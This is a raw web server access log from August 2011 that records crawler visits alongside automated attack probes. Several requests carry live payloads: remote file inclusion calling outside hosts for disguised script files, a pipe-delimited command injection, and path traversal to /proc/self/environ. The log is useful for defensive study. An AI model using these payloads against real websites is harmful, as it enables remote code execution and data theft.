66.71.188.13 - - [28/Aug/2011:15:58:26 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://seeclearlyaccounting.com/recipe/seeclearlyaccounting.jpg?? HTTP/1.1" 404 368 "-" "MaMa CaSpEr"
66.71.188.13 - - [28/Aug/2011:15:58:26 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 368 "-" "MaMa CaSpEr"
66.71.188.13 - - [28/Aug/2011:15:58:26 +0000] "GET /Account//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 377 "-" "MaMa CaSpEr"
66.71.188.13 - - [28/Aug/2011:15:59:15 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://seeclearlyaccounting.com/recipe/seeclearlyaccounting.jpg?? HTTP/1.1" 404 368 "-" "MaMa CaSpEr"
66.71.188.13 - - [28/Aug/2011:15:59:15 +0000] "GET /Account//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://seeclearlyaccounting.com/recipe/seeclearlyaccounting.jpg?? HTTP/1.1" 404 377 "-" "MaMa CaSpEr"
66.71.188.13 - - [28/Aug/2011:15:59:15 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 368 "-" "MaMa CaSpEr"
66.71.188.13 - - [28/Aug/2011:15:59:15 +0000] "GET /Account//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 377 "-" "MaMa CaSpEr"
66.71.188.13 - - [28/Aug/2011:16:01:05 +0000] "GET /Account//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://seeclearlyaccounting.com/recipe/seeclearlyaccounting.jpg?? HTTP/1.1" 404 377 "-" "MaMa CaSpEr"
66.71.188.13 - - [28/Aug/2011:16:01:05 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://seeclearlyaccounting.com/recipe/seeclearlyaccounting.jpg?? HTTP/1.1" 404 368 "-" "MaMa CaSpEr"
66.71.188.13 - - [28/Aug/2011:16:01:05 +0000] "GET /Account/access_log.txt%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fpojo.findmagiccards.com%2FAccount%2Faccess_log.txt','11','8','%22%2Fcontenido%2Fincludes%22','',%20'00fb116f0ed9a2525774456a2d83fc2c321328e9790f4e7fe925',%200)//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://seeclearlyaccounting.com/recipe/seeclearlyaccounting.jpg?? HTTP/1.1" 404 587 "-" "MaMa CaSpEr"
66.71.188.13 - - [28/Aug/2011:16:01:05 +0000] "GET /Account//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 377 "-" "MaMa CaSpEr"
66.71.188.13 - - [28/Aug/2011:16:01:05 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 368 "-" "MaMa CaSpEr"
66.71.188.13 - - [28/Aug/2011:16:01:05 +0000] "GET /Account/access_log.txt%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fpojo.findmagiccards.com%2FAccount%2Faccess_log.txt','11','8','%22%2Fcontenido%2Fincludes%22','',%20'00fb116f0ed9a2525774456a2d83fc2c321328e9790f4e7fe925',%200)//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 587 "-" "MaMa CaSpEr"
38.101.148.126 - - [28/Aug/2011:16:01:10 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)"
208.80.194.27 - - [28/Aug/2011:18:16:06 +0000] "GET / HTTP/1.0" 200 749 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90; SP/8.00/OnlineHTTPS)"
190.11.143.169 - - [28/Aug/2011:19:10:42 +0000] "HEAD /Account/access_log.txt HTTP/1.0" 200 - "-" "Mozilla/4.0 (compatible; ICS)"
38.101.148.126 - - [28/Aug/2011:20:36:37 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)"
67.195.115.166 - - [28/Aug/2011:21:38:07 +0000] "GET /Account/access_log.txt HTTP/1.0" 200 153624 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
123.125.71.79 - - [28/Aug/2011:21:53:27 +0000] "GET /icons/folder.gif HTTP/1.1" 200 225 "-" "Baiduspider-image+(+http://www.baidu.com/search/spider.htm)"
81.52.143.32 - - [28/Aug/2011:22:56:08 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
81.52.143.32 - - [28/Aug/2011:22:56:12 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
66.249.71.114 - - [28/Aug/2011:23:24:46 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.114 - - [28/Aug/2011:23:24:46 +0000] "GET /AQ.html HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
38.101.148.126 - - [29/Aug/2011:01:11:29 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)"
95.108.158.245 - - [29/Aug/2011:02:27:45 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)"
123.125.71.117 - - [29/Aug/2011:03:16:14 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
85.255.216.132 - - [29/Aug/2011:03:21:44 +0000] "GET /Account//include/admin.lib.inc.php?site_path=test?? HTTP/1.1" 404 349 "-" "FreeWebMonitoring SiteChecker/0.1 (+http://www.freewebmonitoring.com)"
85.255.216.132 - - [29/Aug/2011:03:21:46 +0000] "GET /Account//include/admin.lib.inc.php?site_path=http://sklep.fabrykatipsow.pl/raporty/byroe.jpg?? HTTP/1.1" 404 349 "-" "FreeWebMonitoring SiteChecker/0.1 (+http://www.freewebmonitoring.com)"
85.255.216.132 - - [29/Aug/2011:03:21:48 +0000] "GET /Account//include/admin.lib.inc.php?site_path=http://sklep.fabrykatipsow.pl/raporty/allnet.jpg?? HTTP/1.1" 404 349 "-" "FreeWebMonitoring SiteChecker/0.1 (+http://www.freewebmonitoring.com)"
85.255.216.132 - - [29/Aug/2011:03:21:50 +0000] "GET //include/admin.lib.inc.php?site_path=test?? HTTP/1.1" 404 340 "-" "FreeWebMonitoring SiteChecker/0.1 (+http://www.freewebmonitoring.com)"
85.255.216.132 - - [29/Aug/2011:03:21:52 +0000] "GET //include/admin.lib.inc.php?site_path=http://sklep.fabrykatipsow.pl/raporty/byroe.jpg?? HTTP/1.1" 404 340 "-" "FreeWebMonitoring SiteChecker/0.1 (+http://www.freewebmonitoring.com)"
85.255.216.132 - - [29/Aug/2011:03:21:53 +0000] "GET //include/admin.lib.inc.php?site_path=http://sklep.fabrykatipsow.pl/raporty/allnet.jpg?? HTTP/1.1" 404 340 "-" "FreeWebMonitoring SiteChecker/0.1 (+http://www.freewebmonitoring.com)"
67.195.115.166 - - [29/Aug/2011:03:22:18 +0000] "GET /robots.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.115.166 - - [29/Aug/2011:03:22:18 +0000] "GET /Account/?C=N;O=A HTTP/1.0" 200 927 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.115.166 - - [29/Aug/2011:03:32:02 +0000] "GET /?C=S;O=A HTTP/1.0" 200 749 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
85.255.216.132 - - [29/Aug/2011:03:44:13 +0000] "GET /Account/access_log.txt//include/admin.lib.inc.php?site_path=test?? HTTP/1.1" 404 364 "-" "FreeWebMonitoring SiteChecker/0.1 (+http://www.freewebmonitoring.com)"
85.255.216.132 - - [29/Aug/2011:03:44:27 +0000] "GET /Account/access_log.txt//include/admin.lib.inc.php?site_path=http://sklep.fabrykatipsow.pl/raporty/byroe.jpg?? HTTP/1.1" 404 364 "-" "FreeWebMonitoring SiteChecker/0.1 (+http://www.freewebmonitoring.com)"
85.255.216.132 - - [29/Aug/2011:03:44:41 +0000] "GET /Account/access_log.txt//include/admin.lib.inc.php?site_path=http://sklep.fabrykatipsow.pl/raporty/allnet.jpg?? HTTP/1.1" 404 364 "-" "FreeWebMonitoring SiteChecker/0.1 (+http://www.freewebmonitoring.com)"
85.255.216.132 - - [29/Aug/2011:03:44:48 +0000] "GET //include/admin.lib.inc.php?site_path=test?? HTTP/1.1" 404 340 "-" "FreeWebMonitoring SiteChecker/0.1 (+http://www.freewebmonitoring.com)"
85.255.216.132 - - [29/Aug/2011:03:44:51 +0000] "GET //include/admin.lib.inc.php?site_path=http://sklep.fabrykatipsow.pl/raporty/byroe.jpg?? HTTP/1.1" 404 340 "-" "FreeWebMonitoring SiteChecker/0.1 (+http://www.freewebmonitoring.com)"
85.255.216.132 - - [29/Aug/2011:03:44:53 +0000] "GET //include/admin.lib.inc.php?site_path=http://sklep.fabrykatipsow.pl/raporty/allnet.jpg?? HTTP/1.1" 404 340 "-" "FreeWebMonitoring SiteChecker/0.1 (+http://www.freewebmonitoring.com)"
85.255.216.132 - - [29/Aug/2011:03:44:56 +0000] "GET /Account//include/admin.lib.inc.php?site_path=test?? HTTP/1.1" 404 349 "-" "FreeWebMonitoring SiteChecker/0.1 (+http://www.freewebmonitoring.com)"
85.255.216.132 - - [29/Aug/2011:03:44:57 +0000] "GET /Account//include/admin.lib.inc.php?site_path=http://sklep.fabrykatipsow.pl/raporty/byroe.jpg?? HTTP/1.1" 404 349 "-" "FreeWebMonitoring SiteChecker/0.1 (+http://www.freewebmonitoring.com)"
85.255.216.132 - - [29/Aug/2011:03:44:59 +0000] "GET /Account//include/admin.lib.inc.php?site_path=http://sklep.fabrykatipsow.pl/raporty/allnet.jpg?? HTTP/1.1" 404 349 "-" "FreeWebMonitoring SiteChecker/0.1 (+http://www.freewebmonitoring.com)"
95.108.158.245 - - [29/Aug/2011:05:06:28 +0000] "GET /icons/back.gif HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)"
65.52.109.147 - - [29/Aug/2011:05:43:40 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
38.101.148.126 - - [29/Aug/2011:05:47:15 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)"
65.52.109.147 - - [29/Aug/2011:05:56:37 +0000] "GET /Account/access_log.txt HTTP/1.1" 200 159607 "-" "-"
95.108.158.245 - - [29/Aug/2011:07:35:50 +0000] "GET /icons/blank.gif HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)"
209.85.228.85 - - [29/Aug/2011:08:46:55 +0000] "GET / HTTP/1.1" 200 749 "http://translate.googleusercontent.com/translate_c?hl=fr&langpair=en%7Cfr&rurl=translate.google.fr&u=http://www.pojo.com/Magic/featured%2520writers/Zandi/2004/11-24.html&usg=ALkJrhizOL3-q3wNO0v1hqk3mgNx4nEv2Q" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1,gzip(gfe) (via translate.google.com)"
82.249.133.225 - - [29/Aug/2011:08:46:55 +0000] "GET /icons/blank.gif HTTP/1.1" 200 148 "http://translate.googleusercontent.com/translate_c?hl=fr&langpair=en%7Cfr&rurl=translate.google.fr&u=http://pojo.findmagiccards.com/&usg=ALkJrhiGroLQfCQf6_-VquJVH-FsB2LxMA" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1"
82.249.133.225 - - [29/Aug/2011:08:46:55 +0000] "GET /icons/folder.gif HTTP/1.1" 200 225 "http://translate.googleusercontent.com/translate_c?hl=fr&langpair=en%7Cfr&rurl=translate.google.fr&u=http://pojo.findmagiccards.com/&usg=ALkJrhiGroLQfCQf6_-VquJVH-FsB2LxMA" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1"
209.85.226.81 - - [29/Aug/2011:08:47:05 +0000] "GET /?C=M;O=A HTTP/1.1" 200 749 "http://translate.googleusercontent.com/translate_c?hl=fr&langpair=en%7Cfr&rurl=translate.google.fr&u=http://pojo.findmagiccards.com/&usg=ALkJrhiGroLQfCQf6_-VquJVH-FsB2LxMA" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1,gzip(gfe) (via translate.google.com)"
209.85.228.80 - - [29/Aug/2011:08:47:09 +0000] "GET /?C=D;O=A HTTP/1.1" 200 749 "http://translate.googleusercontent.com/translate_c?hl=fr&langpair=en%7Cfr&rurl=translate.google.fr&u=http://pojo.findmagiccards.com/%3FC%3DM%3BO%3DA&usg=ALkJrhhJl91x4tooSBJWT5bKcmtxBTxTHw" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1,gzip(gfe) (via translate.google.com)"
209.85.228.91 - - [29/Aug/2011:08:47:14 +0000] "GET /Account/ HTTP/1.1" 200 927 "http://translate.googleusercontent.com/translate_c?hl=fr&langpair=en%7Cfr&rurl=translate.google.fr&u=http://pojo.findmagiccards.com/%3FC%3DD%3BO%3DA&usg=ALkJrhipYYgJ8v2wDXQXpYwscPrs2AFmQA" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1,gzip(gfe) (via translate.google.com)"
82.249.133.225 - - [29/Aug/2011:08:47:14 +0000] "GET /icons/text.gif HTTP/1.1" 200 229 "http://translate.googleusercontent.com/translate_c?hl=fr&langpair=en%7Cfr&rurl=translate.google.fr&u=http://pojo.findmagiccards.com/Account/&usg=ALkJrhg2TSVw84ow9VDq9fbZsAfuulY2kA" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1"
82.249.133.225 - - [29/Aug/2011:08:47:14 +0000] "GET /icons/back.gif HTTP/1.1" 200 216 "http://translate.googleusercontent.com/translate_c?hl=fr&langpair=en%7Cfr&rurl=translate.google.fr&u=http://pojo.findmagiccards.com/Account/&usg=ALkJrhg2TSVw84ow9VDq9fbZsAfuulY2kA" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1"
209.85.228.90 - - [29/Aug/2011:08:47:17 +0000] "GET /Account/access_log.txt HTTP/1.1" 200 162776 "http://translate.googleusercontent.com/translate_c?hl=fr&langpair=en%7Cfr&rurl=translate.google.fr&u=http://pojo.findmagiccards.com/Account/&usg=ALkJrhg2TSVw84ow9VDq9fbZsAfuulY2kA" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1,gzip(gfe) (via translate.google.com)"
67.195.115.166 - - [29/Aug/2011:09:20:00 +0000] "GET /robots.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.115.166 - - [29/Aug/2011:09:20:00 +0000] "GET /Account/ HTTP/1.0" 200 927 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
119.63.196.12 - - [29/Aug/2011:09:28:30 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
119.63.196.95 - - [29/Aug/2011:09:53:51 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
119.63.196.25 - - [29/Aug/2011:10:07:03 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
38.101.148.126 - - [29/Aug/2011:10:22:01 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)"
50.16.79.200 - - [29/Aug/2011:10:47:10 +0000] "GET /robots.txt HTTP/1.0" 404 325 "-" "Covario-IDS/1.0 (Covario; http://www.covario.com/ids; support at covario dot com)"
50.16.79.200 - - [29/Aug/2011:10:47:10 +0000] "GET /Account/ HTTP/1.0" 200 927 "-" "Covario-IDS/1.0 (Covario; http://www.covario.com/ids; support at covario dot com)"
64.233.172.34 - - [29/Aug/2011:12:28:47 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (en-us) AppleWebKit/534.14 (KHTML, like Gecko; Google Wireless Transcoder) Chrome/9.0.597 Safari/534.14"
64.233.172.34 - - [29/Aug/2011:12:29:25 +0000] "GET /icons/blank.gif HTTP/1.1" 200 148 "http://pojo.findmagiccards.com/" "Mozilla/5.0 (en-us) AppleWebKit/534.14 (KHTML, like Gecko; Google Wireless Transcoder) Chrome/9.0.597 Safari/534.14"
64.233.172.34 - - [29/Aug/2011:12:29:25 +0000] "GET /icons/folder.gif HTTP/1.1" 200 225 "http://pojo.findmagiccards.com/" "Mozilla/5.0 (en-us) AppleWebKit/534.14 (KHTML, like Gecko; Google Wireless Transcoder) Chrome/9.0.597 Safari/534.14"
38.101.148.126 - - [29/Aug/2011:14:56:34 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)"
88.131.106.8 - - [29/Aug/2011:17:19:56 +0000] "GET /robots.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)"
88.131.106.5 - - [29/Aug/2011:17:19:58 +0000] "GET /Account/ HTTP/1.0" 200 927 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)"
38.101.148.126 - - [29/Aug/2011:19:31:12 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)"
119.63.196.28 - - [29/Aug/2011:21:41:17 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
95.108.158.245 - - [30/Aug/2011:00:00:04 +0000] "GET /icons/back.gif HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)"
38.101.148.126 - - [30/Aug/2011:00:13:55 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)"
95.108.158.245 - - [30/Aug/2011:00:32:51 +0000] "GET /icons/blank.gif HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)"
123.125.71.78 - - [30/Aug/2011:00:43:26 +0000] "GET /icons/blank.gif HTTP/1.1" 200 148 "-" "Baiduspider-image+(+http://www.baidu.com/search/spider.htm)"
218.213.130.198 - - [30/Aug/2011:02:34:09 +0000] "GET /?C=S;O=A HTTP/1.1" 200 749 "-" "DoCoMo/2.0 P900i(c100;TB;W24H11) (compatible; ichiro/mobile goo; +http://help.goo.ne.jp/help/article/1142/)"
218.213.130.198 - - [30/Aug/2011:02:34:13 +0000] "GET /?C=D;O=A HTTP/1.1" 200 749 "-" "DoCoMo/2.0 P900i(c100;TB;W24H11) (compatible; ichiro/mobile goo; +http://help.goo.ne.jp/help/article/1142/)"
218.213.130.198 - - [30/Aug/2011:02:35:08 +0000] "GET /Account/ HTTP/1.1" 200 927 "-" "DoCoMo/2.0 P900i(c100;TB;W24H11) (compatible; ichiro/mobile goo; +http://help.goo.ne.jp/help/article/1142/)"
218.213.130.198 - - [30/Aug/2011:02:36:43 +0000] "GET /?C=N;O=D HTTP/1.1" 200 749 "-" "DoCoMo/2.0 P900i(c100;TB;W24H11) (compatible; ichiro/mobile goo; +http://help.goo.ne.jp/help/article/1142/)"
218.213.130.198 - - [30/Aug/2011:02:38:08 +0000] "GET /?C=M;O=A HTTP/1.1" 200 749 "-" "DoCoMo/2.0 P900i(c100;TB;W24H11) (compatible; ichiro/mobile goo; +http://help.goo.ne.jp/help/article/1142/)"
38.101.148.126 - - [30/Aug/2011:05:25:16 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)"
65.52.109.147 - - [30/Aug/2011:06:26:13 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.52.109.147 - - [30/Aug/2011:06:27:08 +0000] "GET /Account/access_log.txt HTTP/1.1" 200 168033 "-" "-"
38.108.67.34 - - [30/Aug/2011:06:57:32 +0000] "GET /robots.txt HTTP/1.0" 404 325 "-" "SBIder/Nutch-1.0-dev (http://www.sitesell.com/sbider.html)"
38.108.67.34 - - [30/Aug/2011:06:57:32 +0000] "GET /Account/AwstatsDatabase/ HTTP/1.0" 404 339 "-" "SBIder/Nutch-1.0-dev (http://www.sitesell.com/sbider.html)"
94.23.6.59 - - [30/Aug/2011:07:55:04 +0000] "GET /Account/?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 927 "-" "libwww-perl/5.803"
94.23.6.59 - - [30/Aug/2011:07:55:04 +0000] "GET /?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 749 "-" "libwww-perl/5.803"
109.123.77.12 - - [30/Aug/2011:07:55:40 +0000] "GET /Account/?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 927 "-" "libwww-perl/6.02"
109.123.77.12 - - [30/Aug/2011:07:55:41 +0000] "GET /?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 749 "-" "libwww-perl/6.02"
109.123.77.12 - - [30/Aug/2011:07:58:27 +0000] "GET /Account/?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 927 "-" "libwww-perl/6.02"
109.123.77.12 - - [30/Aug/2011:07:58:27 +0000] "GET /?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 749 "-" "libwww-perl/6.02"
94.23.6.59 - - [30/Aug/2011:08:18:01 +0000] "GET /Account/?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 927 "-" "libwww-perl/5.803"
94.23.6.59 - - [30/Aug/2011:08:18:01 +0000] "GET /?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 749 "-" "libwww-perl/5.803"
67.195.115.166 - - [30/Aug/2011:09:21:51 +0000] "GET /robots.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.115.166 - - [30/Aug/2011:09:21:51 +0000] "GET / HTTP/1.0" 200 749 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.115.166 - - [30/Aug/2011:09:23:36 +0000] "GET /Account/ HTTP/1.0" 200 927 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
119.63.196.11 - - [30/Aug/2011:09:26:55 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.71.95 - - [30/Aug/2011:10:12:31 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
38.101.148.126 - - [30/Aug/2011:10:24:00 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)"
119.63.196.86 - - [30/Aug/2011:12:08:24 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
38.101.148.126 - - [30/Aug/2011:14:59:19 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)"
205.209.140.180 - - [30/Aug/2011:16:21:46 +0000] "GET /Account/access_log.txt%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fpojo.findmagiccards.com%2FAccount%2Faccess_log.txt','11','4','%22include%2Flib.inc.php%22','',%20'008c0eb2df8787462ffd25a386fd0f61a77a03eefa78571c2ef4',%200)//include/admin.lib.inc.php?site_path=test?? HTTP/1.1" 404 559 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
205.209.140.180 - - [30/Aug/2011:16:21:47 +0000] "GET /Account/access_log.txt%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fpojo.findmagiccards.com%2FAccount%2Faccess_log.txt','11','4','%22include%2Flib.inc.php%22','',%20'008c0eb2df8787462ffd25a386fd0f61a77a03eefa78571c2ef4',%200)//include/admin.lib.inc.php?site_path=http://www.studieur.uniba.it/news/data/upimages/byroe.jpg?? HTTP/1.1" 404 559 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
205.209.140.180 - - [30/Aug/2011:16:21:48 +0000] "GET /Account/access_log.txt%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fpojo.findmagiccards.com%2FAccount%2Faccess_log.txt','11','4','%22include%2Flib.inc.php%22','',%20'008c0eb2df8787462ffd25a386fd0f61a77a03eefa78571c2ef4',%200)//include/admin.lib.inc.php?site_path=http://www.studieur.uniba.it/news/data/upimages/allnet.jpg?? HTTP/1.1" 404 559 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
205.209.140.180 - - [30/Aug/2011:16:21:50 +0000] "GET //include/admin.lib.inc.php?site_path=test?? HTTP/1.1" 404 340 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
205.209.140.180 - - [30/Aug/2011:16:21:51 +0000] "GET //include/admin.lib.inc.php?site_path=http://www.studieur.uniba.it/news/data/upimages/byroe.jpg?? HTTP/1.1" 404 340 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
205.209.140.180 - - [30/Aug/2011:16:21:52 +0000] "GET //include/admin.lib.inc.php?site_path=http://www.studieur.uniba.it/news/data/upimages/allnet.jpg?? HTTP/1.1" 404 340 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
205.209.140.180 - - [30/Aug/2011:16:21:53 +0000] "GET /Account//include/admin.lib.inc.php?site_path=test?? HTTP/1.1" 404 349 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
205.209.140.180 - - [30/Aug/2011:16:21:54 +0000] "GET /Account//include/admin.lib.inc.php?site_path=http://www.studieur.uniba.it/news/data/upimages/byroe.jpg?? HTTP/1.1" 404 349 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
205.209.140.180 - - [30/Aug/2011:16:21:56 +0000] "GET /Account//include/admin.lib.inc.php?site_path=http://www.studieur.uniba.it/news/data/upimages/allnet.jpg?? HTTP/1.1" 404 349 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
205.209.140.180 - - [30/Aug/2011:16:44:10 +0000] "GET /Account/access_log.txt//include/admin.lib.inc.php?site_path=../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 404 364 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
